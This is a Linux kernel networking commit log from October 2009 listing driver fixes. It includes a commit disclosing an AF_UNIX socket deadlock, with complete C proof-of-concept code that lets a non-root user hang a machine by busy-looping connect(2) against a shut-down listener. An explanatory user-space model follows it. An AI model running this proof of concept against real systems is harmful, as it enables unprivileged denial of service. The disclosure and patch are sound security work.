1. 19 Oct, 2009 3 commits
    • AF_UNIX: Fix deadlock on connecting to shutdown socket · 77238f2b
      Tomoki Sekiyama authored
      I found a deadlock bug in UNIX domain sockets, which makes it possible
      for non-root users to mount a DoS attack against the local machine.
      
      How to reproduce:
      1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstract
         namespace(*), and shutdown(2) it.
      2. Repeat connect(2)ing to the listening socket from the other sockets
         until the connection backlog is filled.
      3. connect(2) takes the CPU forever. If every core is taken, the
         system hangs.
      
      PoC code: (Run as many times as cores on SMP machines.)
      
      #include <stdio.h>
      #include <string.h>
      #include <unistd.h>
      #include <sys/socket.h>
      #include <sys/un.h>

      int main(void)
      {
      	int ret;
      	int csd;
      	int lsd;
      	struct sockaddr_un sun;
      
      	/* make an abstract name address (*) */
      	memset(&sun, 0, sizeof(sun));
      	sun.sun_family = PF_UNIX;
      	sprintf(&sun.sun_path[1], "%d", getpid());
      
      	/* create the listening socket and shutdown */
      	lsd = socket(AF_UNIX, SOCK_STREAM, 0);
      	bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
      	listen(lsd, 1);
      	shutdown(lsd, SHUT_RDWR);
      
      	/* connect loop */
      	alarm(15); /* forcibly exit the loop after 15 sec */
      	for (;;) {
      		csd = socket(AF_UNIX, SOCK_STREAM, 0);
      		ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
      		if (-1 == ret) {
      			perror("connect()");
      			break;
      		}
      		puts("Connection OK");
      	}
      	return 0;
      }
      
      (*) Make sun_path[0] = 0 to use the abstract namespace.
          If a file-based socket is used, the system doesn't deadlock because
          of context switches in the file system layer.
      
      Why this happens:
       Error checks between unix_socket_connect() and unix_wait_for_peer() are
       inconsistent. The former calls the latter to wait until the backlog is
       processed. Although the latter returns without doing anything when the
       socket is shut down, the former doesn't check the shutdown state and
       just retries calling the latter forever.
      
      Patch:
       The patch below adds a shutdown check to unix_socket_connect(), so
       connect(2) to the shutdown socket will return -ECONNREFUSED.
      Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
      Signed-off-by: Masanori Yoshida <masanori.yoshida.tv@hitachi.com>
      Signed-off-by: David S. Miller <davem@davemloft.net>
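The inconsistency described in the commit message above, as an added user-space model (not kernel code and not part of the commit): the wait helper declines to sleep on a shut-down peer, so a caller that does not test the shutdown flag itself retries without ever yielding. All names here (`struct listener`, `model_connect`, `replay`, `MODEL_BUSY_LOOP`) are hypothetical, and the retry budget exists only so the model terminates.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdio.h>

#define MODEL_BUSY_LOOP (-1000)	/* model-only marker: retry budget used up */

struct listener { bool rcv_shutdown; int queued; int backlog; };  /* hypothetical */
static bool recvq_full(const struct listener *l) { return l->queued > l->backlog; }

/* Wait helper: sleeps only when the peer is full AND not shut down. */
static bool wait_for_peer(const struct listener *l) { return !l->rcv_shutdown && recvq_full(l); }

/* Connect path; `patched` enables the shutdown check the commit describes. */
static int model_connect(struct listener *l, bool patched, long budget)
{
	long spins = 0;
	while (spins < budget) {
		if (patched && l->rcv_shutdown)
			return -ECONNREFUSED;
		if (!recvq_full(l)) {
			l->queued++;	/* connection queued */
			return 0;
		}
		if (wait_for_peer(l))
			l->queued--;	/* slept; model one accept(2) draining the queue */
		else
			spins++;	/* helper returned at once: CPU-bound retry */
	}
	return MODEL_BUSY_LOOP;
}

/* Replays the sequence from the report: backlog 1, shut down, connect until failure. */
static int replay(bool patched, int *ok)
{
	struct listener l = { .rcv_shutdown = true, .queued = 0, .backlog = 1 };
	int ret;
	for (*ok = 0; (ret = model_connect(&l, patched, 1000000)) == 0; (*ok)++)
		;
	return ret;
}

int main(void)
{
	int ok, ret = replay(false, &ok);
	printf("unpatched: %d queued, then %s\n", ok, ret == MODEL_BUSY_LOOP ? "busy loop" : "error");
	ret = replay(true, &ok);
	printf("patched:   %d queued, then errno %d\n", ok, -ret);
	return 0;
}
```

A listener that is full but not shut down still takes the sleeping branch in both variants, which is why the problem only shows up after shutdown(2).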
    • ethoc: clear only pending irqs · 50c54a57
      Thomas Chou authored
      This patch fixed the problem of dropped packets due to loss of
      interrupt requests. We should only clear what was pending at the
      moment we read the irq source reg.
      Signed-off-by: Thomas Chou <thomas@wytron.com.tw>
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • ethoc: inline regs access · 16dd18b0
      Thomas Chou authored
      Signed-off-by: Thomas Chou <thomas@wytron.com.tw>
      Signed-off-by: David S. Miller <davem@davemloft.net>
  2. 17 Oct, 2009 1 commit
    • vmxnet3: use dev_dbg, fix build for CONFIG_BLOCK=n · f6965582
      Randy Dunlap authored
      vmxnet3 was using dprintk() for debugging output.  This was
      defined in <linux/dst.h> and was the only thing that was
      used from that header file.  This caused compile errors
      when CONFIG_BLOCK was not enabled due to bio* and BIO*
      uses in the header file, so change this driver to use
      dev_dbg() for debugging output.
      
      include/linux/dst.h:520: error: dereferencing pointer to incomplete type
      include/linux/dst.h:520: error: 'BIO_POOL_BITS' undeclared (first use in this function)
      include/linux/dst.h:521: error: dereferencing pointer to incomplete type
      include/linux/dst.h:522: error: dereferencing pointer to incomplete type
      include/linux/dst.h:525: error: dereferencing pointer to incomplete type
      make[4]: *** [drivers/net/vmxnet3/vmxnet3_drv.o] Error 1
      Signed-off-by: Randy Dunlap <randy.dunlap@oracle.com>
      Signed-off-by: Bhavesh Davda <bhavesh@vmware.com>
      Signed-off-by: David S. Miller <davem@davemloft.net>
  3. 15 Oct, 2009 4 commits
    • virtio_net: use dev_kfree_skb_any() in free_old_xmit_skbs() · ed79bab8
      Eric Dumazet authored
      Because netpoll can call netdevice start_xmit() method with
      irqs disabled, drivers should not call kfree_skb() from
      their start_xmit(), but use dev_kfree_skb_any() instead.
      
      Oct  8 11:16:52 172.30.1.31 [113074.791813] ------------[ cut here ]------------
      Oct  8 11:16:52 172.30.1.31 [113074.791813] WARNING: at net/core/skbuff.c:398 \
                      skb_release_head_state+0x64/0xc8()
      Oct  8 11:16:52 172.30.1.31 [113074.791813] Hardware name:
      Oct  8 11:16:52 172.30.1.31 [113074.791813] Modules linked in: netconsole ocfs2 jbd2 quota_tree \
      ocfs2_dlmfs ocfs2_stack_o2cb ocfs2_dlm ocfs2_nodemanager ocfs2_stackglue configfs crc32c drbd cn loop \
      serio_raw psmouse snd_pcm snd_timer snd soundcore snd_page_alloc virtio_net pcspkr parport_pc parport \
      i2c_piix4 i2c_core button processor evdev ext3 jbd mbcache dm_mirror dm_region_hash dm_log dm_snapshot \
      dm_mod ide_cd_mod cdrom ata_generic ata_piix virtio_blk libata scsi_mod piix ide_pci_generic ide_core \
                      virtio_pci virtio_ring virtio floppy thermal fan thermal_sys [last unloaded: netconsole]
      Oct  8 11:16:52 172.30.1.31 [113074.791813] Pid: 11132, comm: php5-cgi Tainted: G        W  \
                      2.6.31.2-vserver #1
      Oct  8 11:16:52 172.30.1.31 [113074.791813] Call Trace:
      Oct  8 11:16:52 172.30.1.31 [113074.791813] <IRQ>  [<ffffffff81253cd5>] ? \
                      skb_release_head_state+0x64/0xc8
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81253cd5>] ? skb_release_head_state+0x64/0xc8
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81049ae1>] ? warn_slowpath_common+0x77/0xa3
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81253cd5>] ? skb_release_head_state+0x64/0xc8
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81253a1a>] ? __kfree_skb+0x9/0x7d
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffffa01cb139>] ? free_old_xmit_skbs+0x51/0x6e \
                      [virtio_net]
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffffa01cbc85>] ? start_xmit+0x26/0xf2 [virtio_net]
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff8126934f>] ? netpoll_send_skb+0xd2/0x205
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffffa0429216>] ? write_msg+0x90/0xeb [netconsole]
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81049f06>] ? __call_console_drivers+0x5e/0x6f
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff8102b49d>] ? kvm_clock_read+0x4d/0x52
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff8104a082>] ? release_console_sem+0x115/0x1ba
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff8104a632>] ? vprintk+0x2f2/0x34b
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff8106b142>] ? vx_update_load+0x18/0x13e
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81308309>] ? printk+0x4e/0x5d
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff8102b49d>] ? kvm_clock_read+0x4d/0x52
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81070b62>] ? getnstimeofday+0x55/0xaf
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81062683>] ? ktime_get_ts+0x21/0x49
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff810626b7>] ? ktime_get+0xc/0x41
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81062788>] ? hrtimer_interrupt+0x9c/0x146
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81024a4b>] ? smp_apic_timer_interrupt+0x80/0x93
      Oct  8 11:16:52 172.30.1.31 [113074.791813] [<ffffffff81011663>] ? apic_timer_interrupt+0x13/0x20
      Oct  8 11:16:52 172.30.1.31 [113074.791813] <EOI>  [<ffffffff8130a9eb>] ? _spin_unlock_irq+0xd/0x31
      Reported-and-tested-by: Massimo Cetra <mcetra@navynet.it>
      Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
      Bug-Entry: http://bugzilla.kernel.org/show_bug.cgi?id=14378
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • be2net: fix support for PCI hot plug · 43a04fdc
      Sathya Perla authored
      Before issuing any cmds to the FW, the driver must first wait
      till the FW becomes ready. This is needed for PCI hot plug when
      the driver can be probed while the card fw is being initialized.
      Signed-off-by: Sathya Perla <sathyap@serverengines.com>
      Signed-off-by: David S. Miller <davem@davemloft.net>
    • vmxnet: fix 2 build problems · 8f7e524c
      Randy Dunlap authored
      vmxnet3 uses in_dev* interfaces so it should depend on INET.
      Also fix so that the driver builds when CONFIG_PCI_MSI is disabled.
      
      vmxnet3_drv.c:(.text+0x2a88cb): undefined reference to `in_dev_finish_destroy'
      
      drivers/net/vmxnet3/vmxnet3_drv.c:1335: error: 'struct vmxnet3_intr' has no member named 'msix_entries'
      drivers/net/vmxnet3/vmxnet3_drv.c:1384: error: 'struct vmxnet3_intr' has no member named 'msix_entries'
      drivers/net/vmxnet3/vmxnet3_drv.c:2137: error: 'struct vmxnet3_intr' has no member named 'msix_entries'
      drivers/net/vmxnet3/vmxnet3_drv.c:2138: error: 'struct vmxnet3_intr' has no member named 'msix_entries'
      Signed-off-by: Randy Dunlap <randy.dunlap@oracle.com>
      Signed-off-by: Bhavesh davda <bhavesh@vmware.com>
      Signed-off-by: David S. Miller <davem@davemloft.net>
  4. 14 Oct, 2009 4 commits
  5. 13 Oct, 2009 14 commits
  6. 12 Oct, 2009 10 commits
  7. 09 Oct, 2009 4 commits